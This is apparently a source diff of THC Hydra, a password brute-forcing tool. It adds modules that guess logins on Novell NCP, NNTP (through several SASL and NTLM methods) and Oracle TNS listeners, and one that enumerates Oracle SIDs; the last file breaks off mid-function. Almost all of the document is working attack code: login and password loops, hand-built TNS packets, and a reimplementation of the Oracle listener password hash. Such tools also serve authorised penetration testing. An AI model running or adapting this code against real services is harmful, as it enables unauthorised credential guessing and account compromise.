// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

197
hydra-ncp.c Normal file
View file

@ -0,0 +1,197 @@
/*
* Novell Network Core Protocol Support - by David Maciejak @ GMAIL dot com
* Tested on Netware 6.5
*
* you need to install libncp and libncp-dev (tested with version 2.2.6-3)
*
* you can passed full context as OPT
*
* example: ./hydra -L login -P passw 172.16.246.129 ncp .O=cx
*
*/
#include "hydra-mod.h"
#ifndef LIBNCP
void dummy_ncp() {
printf("\n");
}
#else
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <ncp/nwcalls.h>
extern char *HYDRA_EXIT;
extern int child_head_no;
typedef struct __NCP_DATA {
struct ncp_conn_spec spec;
struct ncp_conn *conn;
char *context;
} _NCP_DATA;
//uncomment line below to see more trace stack
//#define NCP_DEBUG
int start_ncp(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *login;
char *pass;
char context[256];
unsigned int ncp_lib_error_code;
char *empty = "";
int object_type = NCP_BINDERY_USER;
_NCP_DATA *session;
session = malloc(sizeof(_NCP_DATA));
memset(session, 0, sizeof(_NCP_DATA));
login = empty;
pass = empty;
if (strlen(login = hydra_get_next_login()) == 0) {
login = empty;
} else {
if (miscptr) {
if (strlen(miscptr) + strlen(login) > sizeof(context)) {
free(session);
return 4;
}
memset(context, 0, sizeof(context));
strncpy(context, login, strlen(login));
strncpy(context + strlen(login), miscptr, sizeof(miscptr) + 1);
login = context;
}
}
//login and password are case insensitive
//str_upper(login);
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
ncp_lib_error_code = ncp_find_conn_spec3(hydra_address2string(ip), login, "", 1, getuid(), 0, &session->spec);
if (ncp_lib_error_code) {
free(session);
return 1;
}
ncp_lib_error_code = NWCCOpenConnByName(NULL, session->spec.server, NWCC_NAME_FORMAT_BIND, NWCC_OPEN_NEW_CONN, NWCC_RESERVED, &session->conn);
if (ncp_lib_error_code) {
free(session);
return 1;
}
memset(session->spec.password, 0, sizeof(session->spec.password));
memcpy(session->spec.password, pass, strlen(pass) + 1);
//str_upper(session->spec.password);
ncp_lib_error_code = ncp_login_conn(session->conn, session->spec.user, object_type, session->spec.password);
switch (ncp_lib_error_code & 0x0000FFFF) {
case 0x0000: /* Success */
#ifdef NCP_DEBUG
printf("Connection success (%s / %s). Error code: %X\n", login, pass, ncp_lib_error_code);
#endif
ncp_close(session->conn);
hydra_report_found_host(port, ip, "ncp", fp); //ok
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3; //exit
free(session);
return 2; //next
break;
case 0x89DE: /* PASSWORD INVALID */
case 0x89F0: /* BIND WILDCARD INVALID */
case 0x89FF: /* NO OBJ OR BAD PASSWORD */
case 0xFD63: /* FAILED_AUTHENTICATION */
case 0xFDA7: /* NO_SUCH_ENTRY */
#ifdef NCP_DEBUG
printf("Incorrect password (%s / %s). Error code: %X\n", login, pass, ncp_lib_error_code);
#endif
ncp_close(session->conn);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) {
free(session);
return 2; //next
}
break;
default:
#ifdef NCP_DEBUG
printf("Failed to open connection. Error code: %X\n", ncp_lib_error_code);
#endif
if (session->conn != NULL)
ncp_close(session->conn);
break;
}
free(session);
return 1; //reconnect
}
void service_ncp(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_NCP;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
if (sock < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
case 2:
/*
* Here we start the password cracking process
*/
next_run = start_ncp(sock, ip, port, options, miscptr, fp);
break;
case 3:
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
case 4:
if (child_head_no == 0)
fprintf(stderr, "[ERROR] Optional parameter too long!\n");
hydra_child_exit(0);
default:
fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
#endif
int service_ncp_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

475
hydra-nntp.c Normal file
View file

@ -0,0 +1,475 @@
#include "hydra-mod.h"
#include "sasl.h"
/*
Based on:
RFC 3977: Network News Transfer Protocol (NNTP)
RFC 4643: Network News Transfer Protocol (NNTP) Extension for Authentication
*/
int nntp_auth_mechanism = AUTH_CLEAR;
extern char *HYDRA_EXIT;
char *buf;
char *nntp_read_server_capacity(int sock) {
char *ptr = NULL;
int resp = 0;
char *buf = NULL;
do {
if (buf != NULL)
free(buf);
ptr = buf = hydra_receive_line(sock);
if (buf != NULL) {
if (isdigit((int) buf[0]) && buf[3] == ' ')
resp = 1;
else {
if (buf[strlen(buf) - 1] == '\n')
buf[strlen(buf) - 1] = 0;
if (buf[strlen(buf) - 1] == '\r')
buf[strlen(buf) - 1] = 0;
#ifdef NO_RINDEX
if ((ptr = strrchr(buf, '\n')) != NULL) {
#else
if ((ptr = rindex(buf, '\n')) != NULL) {
#endif
ptr++;
if (isdigit((int) *ptr) && *(ptr + 3) == ' ')
resp = 1;
}
}
}
} while (buf != NULL && resp == 0);
return buf;
}
int start_nntp(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "\"\"";
char *login, *pass, buffer[300], buffer2[500];
int i = 1;
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
while (i > 0 && hydra_data_ready(s) > 0)
i = hydra_recv(s, buffer, 300);
switch (nntp_auth_mechanism) {
case AUTH_LOGIN:
sprintf(buffer, "AUTHINFO SASL LOGIN\r\n");
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (buf == NULL || strstr(buf, "383") == NULL) {
hydra_report(stderr, "[ERROR] NNTP LOGIN AUTH : %s\n", buf);
free(buf);
return 3;
}
free(buf);
strcpy(buffer2, login);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "%.250s\r\n", buffer2);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (buf == NULL || strstr(buf, "383") == NULL) {
hydra_report(stderr, "[ERROR] NNTP LOGIN AUTH : %s\n", buf);
free(buf);
return 3;
}
free(buf);
strcpy(buffer2, pass);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "%.250s\r\n", buffer2);
break;
case AUTH_PLAIN:
sprintf(buffer, "AUTHINFO SASL PLAIN\r\n");
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (buf == NULL || strstr(buf, "383") == NULL) {
hydra_report(stderr, "[ERROR] NNTP PLAIN AUTH : %s\n", buf);
free(buf);
return 3;
}
free(buf);
memset(buffer, 0, sizeof(buffer));
sasl_plain(buffer, login, pass);
sprintf(buffer, "%.250s\r\n", buffer);
break;
#ifdef LIBOPENSSL
case AUTH_CRAMMD5:{
int rc = 0;
char *preplogin;
rc = sasl_saslprep(login, SASL_ALLOW_UNASSIGNED, &preplogin);
if (rc) {
return 3;
}
sprintf(buffer, "AUTHINFO SASL CRAM-MD5\r\n");
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
//get the one-time BASE64 encoded challenge
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (buf == NULL || strstr(buf, "383") == NULL) {
hydra_report(stderr, "[ERROR] NNTP CRAM-MD5 AUTH : %s\n", buf);
free(buf);
return 3;
}
memset(buffer, 0, sizeof(buffer));
from64tobits((char *) buffer, buf + 4);
free(buf);
memset(buffer2, 0, sizeof(buffer2));
sasl_cram_md5(buffer2, pass, buffer);
sprintf(buffer, "%s %.250s", preplogin, buffer2);
hydra_tobase64((unsigned char *) buffer, strlen(buffer), sizeof(buffer));
sprintf(buffer, "%.250s\r\n", buffer);
free(preplogin);
}
break;
case AUTH_DIGESTMD5:{
sprintf(buffer, "AUTHINFO SASL DIGEST-MD5\r\n");
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
//receive
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (buf == NULL || strstr(buf, "383") == NULL) {
hydra_report(stderr, "[ERROR] NNTP DIGEST-MD5 AUTH : %s\n", buf);
free(buf);
return 3;
}
memset(buffer, 0, sizeof(buffer));
from64tobits((char *) buffer, buf + 4);
free(buf);
if (verbose)
hydra_report(stderr, "DEBUG S: %s\n", buffer);
sasl_digest_md5(buffer2, login, pass, buffer, miscptr, "nntp", NULL, 0, NULL);
if (buffer2 == NULL)
return 3;
if (verbose)
hydra_report(stderr, "DEBUG C: %s\n", buffer2);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "%s\r\n", buffer2);
}
break;
#endif
case AUTH_NTLM:{
unsigned char buf1[4096];
unsigned char buf2[4096];
//send auth and receive challenge
buildAuthRequest((tSmbNtlmAuthRequest *) buf2, 0, NULL, NULL);
to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthRequest *) buf2));
sprintf(buffer, "AUTHINFO SASL NTLM %s\r\n", (char *) buf1);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (buf == NULL || strstr(buf, "383") == NULL) {
hydra_report(stderr, "[ERROR] NNTP NTLM AUTH : %s\n", buf);
free(buf);
return 3;
}
//recover challenge
from64tobits((char *) buf1, buf + 4);
free(buf);
buildAuthResponse((tSmbNtlmAuthChallenge *) buf1, (tSmbNtlmAuthResponse *) buf2, 0, login, pass, NULL, NULL);
to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthResponse *) buf2));
sprintf(buffer, "%s\r\n", (char *) buf1);
}
break;
default:{
sprintf(buffer, "AUTHINFO USER %.250s\r\n", login);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
buf = hydra_receive_line(s);
if (buf == NULL)
return 1;
if (buf[0] != '3') {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Not an NNTP protocol or service shutdown: %s\n", buf);
free(buf);
return (3);
}
free(buf);
sprintf(buffer, "AUTHINFO PASS %.250s\r\n", pass);
}
break;
}
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
buf = hydra_receive_line(s);
if (buf == NULL)
return 1;
if (buf[0] == '2') {
hydra_report_found_host(port, ip, "nntp", fp);
hydra_completed_pair_found();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
free(buf);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
}
void service_nntp(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int i = 0, run = 1, next_run = 1, sock = -1;
int myport = PORT_NNTP, mysslport = PORT_NNTP_SSL, disable_tls = 0;
char *buffer1 = "CAPABILITIES\r\n";
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(300000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
// usleep(300000);
buf = hydra_receive_line(sock);
if (buf == NULL || buf[0] != '2') { /* check the first line */
if (verbose || debug)
hydra_report(stderr, "[ERROR] Not an NNTP protocol or service shutdown: %s\n", buf);
hydra_child_exit(2);
}
free(buf);
/* send capability request */
if (hydra_send(sock, buffer1, strlen(buffer1), 0) < 0)
hydra_child_exit(2);
buf = nntp_read_server_capacity(sock);
if (buf == NULL) {
hydra_child_exit(2);
}
#ifdef LIBOPENSSL
if (!disable_tls) {
/* if we got a positive answer */
if (strstr(buf, "STARTTLS") != NULL) {
hydra_send(sock, "STARTTLS\r\n", strlen("STARTTLS\r\n"), 0);
free(buf);
buf = hydra_receive_line(sock);
/* 382 Begin TLS negotiation now */
if (buf == NULL || strstr(buf, "382") == NULL) {
if (verbose)
hydra_report(stderr, "[VERBOSE] TLS negotiation failed\n");
} else {
free(buf);
if ((hydra_connect_to_ssl(sock) == -1)) {
if (verbose)
hydra_report(stderr, "[ERROR] Can't use TLS\n");
disable_tls = 1;
run = 1;
break;
} else {
if (verbose)
hydra_report(stderr, "[VERBOSE] TLS connection done\n");
}
/* ask again capability request but in TLS mode */
if (hydra_send(sock, buffer1, strlen(buffer1), 0) < 0)
hydra_child_exit(2);
/* we asking again cause often plain and login can only
be negociate in SSL tunnel
*/
buf = nntp_read_server_capacity(sock);
if (buf == NULL) {
hydra_child_exit(2);
}
}
}
}
#endif
/*
AUTHINFO USER SASL
SASL PLAIN DIGEST-MD5 LOGIN NTLM CRAM-MD5
*/
#ifdef HAVE_PCRE
if (hydra_string_match(buf, "SASL\\s.*NTLM")) {
#else
if (strstr(buf, "NTLM") != NULL) {
#endif
nntp_auth_mechanism = AUTH_NTLM;
}
#ifdef LIBOPENSSL
#ifdef HAVE_PCRE
if (hydra_string_match(buf, "SASL\\s.*DIGEST-MD5")) {
#else
if (strstr(buf, "DIGEST-MD5") != NULL) {
#endif
nntp_auth_mechanism = AUTH_DIGESTMD5;
}
#ifdef HAVE_PCRE
if (hydra_string_match(buf, "SASL\\s.*CRAM-MD5")) {
#else
if (strstr(buf, "CRAM-MD5") != NULL) {
#endif
nntp_auth_mechanism = AUTH_CRAMMD5;
}
#endif
#ifdef HAVE_PCRE
if (hydra_string_match(buf, "SASL\\s.*PLAIN")) {
#else
if (strstr(buf, "PLAIN") != NULL) {
#endif
nntp_auth_mechanism = AUTH_PLAIN;
}
#ifdef HAVE_PCRE
if (hydra_string_match(buf, "SASL\\s.*LOGIN")) {
#else
if (strstr(buf, "LOGIN") != NULL) {
#endif
nntp_auth_mechanism = AUTH_LOGIN;
}
#ifdef HAVE_PCRE
if (hydra_string_match(buf, "AUTHINFO\\sUSER")) {
#else
if (strstr(buf, "AUTHINFO USER") != NULL) {
#endif
nntp_auth_mechanism = AUTH_CLEAR;
}
if ((miscptr != NULL) && (strlen(miscptr) > 0)) {
for (i = 0; i < strlen(miscptr); i++)
miscptr[i] = (char) toupper((int) miscptr[i]);
if (strncmp(miscptr, "USER", 4) == 0)
nntp_auth_mechanism = AUTH_CLEAR;
if (strncmp(miscptr, "LOGIN", 5) == 0)
nntp_auth_mechanism = AUTH_LOGIN;
if (strncmp(miscptr, "PLAIN", 5) == 0)
nntp_auth_mechanism = AUTH_PLAIN;
#ifdef LIBOPENSSL
if (strncmp(miscptr, "CRAM-MD5", 8) == 0)
nntp_auth_mechanism = AUTH_CRAMMD5;
if (strncmp(miscptr, "DIGEST-MD5", 10) == 0)
nntp_auth_mechanism = AUTH_DIGESTMD5;
#endif
if (strncmp(miscptr, "NTLM", 4) == 0)
nntp_auth_mechanism = AUTH_NTLM;
}
if (verbose) {
switch (nntp_auth_mechanism) {
case AUTH_CLEAR:
hydra_report(stderr, "[VERBOSE] using NNTP AUTHINFO USER mechanism\n");
break;
case AUTH_LOGIN:
hydra_report(stderr, "[VERBOSE] using NNTP LOGIN AUTH mechanism\n");
break;
case AUTH_PLAIN:
hydra_report(stderr, "[VERBOSE] using NNTP PLAIN AUTH mechanism\n");
break;
#ifdef LIBOPENSSL
case AUTH_CRAMMD5:
hydra_report(stderr, "[VERBOSE] using NNTP CRAM-MD5 AUTH mechanism\n");
break;
case AUTH_DIGESTMD5:
hydra_report(stderr, "[VERBOSE] using NNTP DIGEST-MD5 AUTH mechanism\n");
break;
#endif
case AUTH_NTLM:
hydra_report(stderr, "[VERBOSE] using NNTP NTLM AUTH mechanism\n");
break;
}
}
usleep(25000);
free(buf);
next_run = 2;
break;
case 2: /* run the cracking function */
next_run = start_nntp(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
int service_nntp_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

339
hydra-oracle-listener.c Normal file
View file

@ -0,0 +1,339 @@
/*
david:
PASSWORDS_LISTENER in listener.ora can be in clear or in plain mode,
this module support the 2 modes, use -m PLAIN or -m CLEAR on the cmd
line. Default is plain (oracle 10 uses it).
Thanks to Marcell for the plain mode analysis available
at http://marcellmajor.com/frame_listenerhash.html
*/
#include "hydra-mod.h"
#ifndef LIBOPENSSL
#include <stdio.h>
void dummy_oracle_listener() {
printf("\n");
}
#else
#include <sasl.h>
#include <openssl/des.h>
#define HASHSIZE 17
extern char *HYDRA_EXIT;
char *buf;
unsigned char *hash;
int sid_mechanism = AUTH_PLAIN;
int initial_permutation(unsigned char **result, char *p_str, int *sz) {
int k = 0;
int i = strlen(p_str);
char *buff;
//expand the string with zero so that length is a multiple of 4
while ((i % 4) != 0) {
i = i + 1;
}
*sz = 2 * i;
if ((buff = malloc(i)) == NULL) {
hydra_report(stderr, "[ERROR] Can't allocate memory\n");
return 1;
}
memset(buff, 0, i);
strncpy(buff, p_str, strlen(p_str));
//swap the order of every byte pair
for (k = 0; k < i; k += 2) {
char bck = buff[k + 1];
buff[k + 1] = buff[k];
buff[k] = bck;
}
//convert to unicode
if ((*result = malloc(2 * i)) == NULL) {
hydra_report(stderr, "[ERROR] Can't allocate memory\n");
free(buff);
return 1;
}
memset(*result, 0, 2 * i);
for (k = 0; k < i; k++) {
(*result)[2 * k] = buff[k];
}
free(buff);
return 0;
}
int ora_hash(unsigned char **orahash, unsigned char *buf, int len) {
int i;
if ((*orahash = malloc(HASHSIZE)) == NULL) {
hydra_report(stderr, "[ERROR] Can't allocate memory\n");
return 1;
}
for (i = 0; i < 8; i++) {
sprintf(((char *) *orahash) + i * 2, "%02X", buf[len - 8 + i]);
}
return 0;
}
int convert_byteorder(unsigned char **result, int size) {
int i = 0;
char *buff;
if ((buff = malloc(size)) == NULL) {
hydra_report(stderr, "[ERROR] Can't allocate memory\n");
return 1;
}
memcpy(buff, *result, size);
while (i < size) {
buff[i + 0] = (*result)[i + 3];
buff[i + 1] = (*result)[i + 2];
buff[i + 2] = (*result)[i + 1];
buff[i + 3] = (*result)[i + 0];
i += 4;
}
memcpy(*result, buff, size);
free(buff);
return 0;
}
int ora_descrypt(unsigned char **rs, unsigned char *result, int siz) {
int i = 0;
char lastkey[8];
des_key_schedule ks1;
unsigned char key1[8] = { 0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF };
unsigned char ivec1[] = { 0, 0, 0, 0, 0, 0, 0, 0 };
unsigned char *desresult;
memset(ivec1, 0, sizeof(ivec1));
if ((desresult = malloc(siz)) == NULL) {
hydra_report(stderr, "[ERROR] Can't allocate memory\n");
return 1;
}
des_key_sched((C_Block *) key1, ks1);
des_ncbc_encrypt(result, desresult, siz, ks1, &ivec1, DES_ENCRYPT);
for (i = 0; i < 8; i++) {
lastkey[i] = desresult[siz - 8 + i];
}
des_key_sched((C_Block *) lastkey, ks1);
memset(desresult, 0, siz);
memset(ivec1, 0, sizeof(ivec1));
des_ncbc_encrypt(result, desresult, siz, ks1, &ivec1, DES_ENCRYPT);
if ((*rs = malloc(siz)) == NULL) {
hydra_report(stderr, "[ERROR] Can't allocate memory\n");
free(desresult);
return 1;
}
memcpy(*rs, desresult, siz);
return 0;
}
int ora_hash_password(char *pass) {
// secret hash function comes here, and written to char *hash
int siz = 0;
unsigned char *desresult;
unsigned char *result;
char buff[strlen(pass) + 5];
memset(buff, 0, sizeof(buff));
//concatenate Arb string and convert the resulting string to uppercase
snprintf(buff, sizeof(buff), "Arb%s", pass);
strupper(buff);
if (initial_permutation(&result, buff, &siz)) {
hydra_report(stderr, "[ERROR] ora_hash_password: in initial_permutation\n");
return 1;
}
if (convert_byteorder(&result, siz)) {
hydra_report(stderr, "[ERROR] ora_hash_password: in convert_byteorder\n");
return 1;
}
if (ora_descrypt(&desresult, result, siz)) {
hydra_report(stderr, "[ERROR] ora_hash_password: in DES crypt\n");
return 1;
}
free(result);
if (ora_hash(&result, desresult, siz)) {
hydra_report(stderr, "[ERROR] ora_hash_password: in extracting Oracle hash\n");
return 1;
}
memcpy(hash, result, HASHSIZE);
free(desresult);
free(result);
return 0;
}
int start_oracle_listener(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
unsigned char tns_packet_begin[22] = {
"\x00\x00\x01\x00\x00\x00\x01\x36\x01\x2c\x00\x00\x08\x00\x7f\xff\x86\x0e\x00\x00\x01\x00"
};
unsigned char tns_packet_end[32] = {
"\x00\x3a\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x09\x94\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00"
};
char *empty = "";
char *pass;
char connect_string[200];
char buffer2[260];
int siz = 0;
memset(connect_string, 0, sizeof(connect_string));
memset(buffer2, 0, sizeof(buffer2));
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
if (sid_mechanism == AUTH_PLAIN) {
if ((hash = malloc(HASHSIZE)) == NULL) {
hydra_report(stderr, "[ERROR] Can't allocate memory\n");
return 1;
}
memset(hash, 0, HASHSIZE);
if (ora_hash_password(pass)) {
hydra_report(stderr, "[ERROR] generating Oracle hash\n");
free(hash);
return 1;
}
pass = (char *) hash;
}
snprintf(connect_string, sizeof(connect_string), "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=))(COMMAND=reload)(PASSWORD=%s)(SERVICE=)(VERSION=169869568)))", pass);
if (hash != NULL)
free(hash);
if (verbose)
hydra_report(stderr, "[VERBOSE] using connectiong string: %s\n", connect_string);
siz = 2 + sizeof(tns_packet_begin) + 2 + sizeof(tns_packet_end) + strlen(connect_string);
if (siz > 255) {
buffer2[0] = 1;
buffer2[1] = siz - 256;
} else {
buffer2[1] = siz;
}
memcpy(buffer2 + 2, (char *) tns_packet_begin, sizeof(tns_packet_begin));
siz = strlen(connect_string);
if (siz > 255) {
buffer2[2 + sizeof(tns_packet_begin)] = 1;
buffer2[1 + 2 + sizeof(tns_packet_begin)] = siz - 256;
} else {
buffer2[1 + 2 + sizeof(tns_packet_begin)] = siz;
}
memcpy(buffer2 + 2 + sizeof(tns_packet_begin) + 2, (char *) tns_packet_end, sizeof(tns_packet_end));
memcpy(buffer2 + 2 + sizeof(tns_packet_begin) + 2 + sizeof(tns_packet_end), connect_string, strlen(connect_string));
if (hydra_send(s, buffer2, 2 + sizeof(tns_packet_begin) + 2 + sizeof(tns_packet_end) + strlen(connect_string), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (verbose || debug)
hydra_report(stderr, "[VERBOSE] Server answer: %s\n", buf);
if (strstr(buf, "ERR=0") != NULL) {
hydra_report_found_host(port, ip, "oracle-listener", fp);
hydra_completed_pair_found();
} else
hydra_completed_pair();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_oracle_listener(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_ORACLE, mysslport = PORT_ORACLE_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
if ((miscptr != NULL) && (strlen(miscptr) > 0)) {
strupper(miscptr);
if (strncmp(miscptr, "CLEAR", 5) == 0)
sid_mechanism = AUTH_CLEAR;
}
if (verbose) {
switch (sid_mechanism) {
case AUTH_CLEAR:
hydra_report(stderr, "[VERBOSE] using SID CLEAR mechanism\n");
break;
case AUTH_PLAIN:
hydra_report(stderr, "[VERBOSE] using SID PLAIN mechanism\n");
break;
}
}
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(300000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
/* run the cracking function */
next_run = start_oracle_listener(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
case 4:
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(2);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
int service_oracle_listener_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
#endif

151
hydra-oracle-sid.c Normal file
View file

@ -0,0 +1,151 @@
/*
david:
module used to check for a valid oracle SID
ORCL and XE are a good start, but you should
find a big list on the Internet
*/
#include "hydra-mod.h"
#ifndef LIBOPENSSL
#include <stdio.h>
void dummy_oracle_sid() {
printf("\n");
}
#else
#include <openssl/des.h>
#define HASHSIZE 16
extern char *HYDRA_EXIT;
char *buf;
unsigned char *hash;
int start_oracle_sid(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
/*
PP is the packet length
XX is the length of connect data
PP + tns_packet_begin + XX + tns_packet_end
*/
unsigned char tns_packet_begin[22] = {
"\x00\x00\x01\x00\x00\x00\x01\x36\x01\x2c\x00\x00\x08\x00\x7f\xff\x86\x0e\x00\x00\x01\x00"
};
unsigned char tns_packet_end[32] = {
"\x00\x3a\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x09\x94\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00"
};
char *empty = "";
char *login;
char connect_string[200];
char buffer2[260];
int siz = 0;
memset(connect_string, 0, sizeof(connect_string));
memset(buffer2, 0, sizeof(buffer2));
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
snprintf(connect_string, sizeof(connect_string), "(DESCRIPTION=(CONNECT_DATA=(SID=%s)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=)))(ADDRESS=(PROTOCOL=tcp)(HOST=%s)(PORT=%d)))", login,
hydra_address2string(ip), port);
siz = 2 + sizeof(tns_packet_begin) + 2 + sizeof(tns_packet_end) + strlen(connect_string);
if (siz > 255) {
buffer2[0] = 1;
buffer2[1] = siz - 256;
} else {
buffer2[1] = siz;
}
memcpy(buffer2 + 2, (char *) tns_packet_begin, sizeof(tns_packet_begin));
siz = strlen(connect_string);
if (siz > 255) {
buffer2[2 + sizeof(tns_packet_begin)] = 1;
buffer2[1 + 2 + sizeof(tns_packet_begin)] = siz - 256;
} else {
buffer2[1 + 2 + sizeof(tns_packet_begin)] = siz;
}
memcpy(buffer2 + 2 + sizeof(tns_packet_begin) + 2, (char *) tns_packet_end, sizeof(tns_packet_end));
memcpy(buffer2 + 2 + sizeof(tns_packet_begin) + 2 + sizeof(tns_packet_end), connect_string, strlen(connect_string));
if (hydra_send(s, buffer2, 2 + sizeof(tns_packet_begin) + 2 + sizeof(tns_packet_end) + strlen(connect_string), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
//if no error reported. it should be a resend packet type 00 08 00 00 0b 00 00 00, 4 is refuse
if ((strstr(buf, "ERR=") == NULL) && (buf[4] != 4)) {
hydra_report_found_host(port, ip, "oracle-sid", fp);
hydra_completed_pair_found();
} else
hydra_completed_pair();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_oracle_sid(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_ORACLE, mysslport = PORT_ORACLE_SSL;
